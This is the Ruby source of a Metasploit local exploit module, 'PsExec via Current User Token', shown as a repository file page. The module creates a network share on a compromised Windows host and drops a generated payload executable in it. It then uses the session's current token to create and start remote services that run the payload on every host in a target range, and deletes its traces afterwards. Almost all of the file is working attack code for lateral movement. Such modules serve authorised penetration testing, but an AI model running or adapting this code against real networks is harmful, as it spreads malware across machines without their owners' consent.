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Notably, DisclosureDate is required for other module parsers, so let's not ignore those, even if you have to guess at the disclosure or call the module's publish date the disclosure date.
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4.5 KiB
Ruby
136 lines
4.5 KiB
Ruby
##
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# $Id$
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##
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##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# Framework web site for more information on licensing and terms of use.
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# http://metasploit.com/framework/
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##
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require 'msf/core'
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require 'rex'
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require 'msf/core/post/windows/services'
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class Metasploit3 < Msf::Exploit::Local
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Rank = ExcellentRanking
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include Post::Windows::WindowsServices
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include Exploit::EXE
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include Post::File
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include Post::Common
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def initialize(info={})
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super( update_info( info,
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'Name' => 'PsExec via Current User Token',
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'Description' => %q{
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This module uploads an executable file to the victim system, creates
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a share containing that executable, creates a remote service on each
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target system using a UNC path to that file, and finally starts the
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service(s).
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The result is similar to psexec but with the added benefit of using
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the session's current authentication token instead of having to know
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a password or hash.
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},
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'License' => MSF_LICENSE,
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'Author' => [
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'egypt',
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'jabra' # Brainstorming and help with original technique
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],
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'References' => [
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# same as for windows/smb/psexec
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[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
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[ 'OSVDB', '3106'],
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[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
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],
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'DisclosureDate' => 'Jan 01 1999',
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'Version' => '$Revision$',
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'Platform' => [ 'windows' ],
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'SessionTypes' => [ 'meterpreter' ],
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'Targets' => [ [ 'Universal', {} ] ],
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'DefaultTarget' => 0
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))
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register_options([
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OptString.new("INTERNAL_ADDRESS", [
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false,
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"Session's internal address or hostname for the victims to grab the "+
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"payload from (Default: detected)"
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]),
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OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
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OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
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OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
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])
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end
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def exploit
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name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
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display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
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# XXX Find the domain controller
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#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
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share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
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print_status "Using #{share_host} as the internal address for victims to get the payload from"
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# Build a random name for the share and directory
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share_name = Rex::Text.rand_text_alphanumeric(8)
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drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
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share_dir = "#{drive}\\#{share_name}"
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# Create them
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print_status("Creating share #{share_dir}")
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session.fs.dir.mkdir(share_dir)
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cmd_exec("net share #{share_name}=#{share_dir}")
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# Generate an executable from the shellcode and drop it in the share
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# directory
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filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
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payload_exe = generate_payload_exe_service(
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:servicename => name,
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# XXX Ghetto
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:arch => payload.send(:pinst).arch.first
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)
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print_status("Dropping payload #{filename}")
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write_file("#{share_dir}\\#{filename}", payload_exe)
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service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
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begin
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Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
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begin
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print_status("#{server.ljust(16)} Creating service #{name}")
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# 3 is Manual startup. Should probably have constants for this junk
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service_create(name, display_name, service_executable, 3, server)
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# If everything went well, this will create a session. If not, it
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# might be permissions issues or possibly we failed to create the
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# service.
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print_status("#{server.ljust(16)} Starting the service")
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service_start(name, server)
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print_status("#{server.ljust(16)} Deleting the service")
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service_delete(name, server)
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rescue
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print_error("Exception running payload: #{$!.class} : #{$!}")
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print_error("#{server.ljust(16)} WARNING: May have failed to clean up!")
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print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
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next
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end
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end
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ensure
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print_status("Deleting share #{share_name}")
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cmd_exec("net share #{share_name} /delete /y")
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print_status("Deleting files #{share_dir}")
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cmd_exec("cmd /c rmdir /q /s #{share_dir}")
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end
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end
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end
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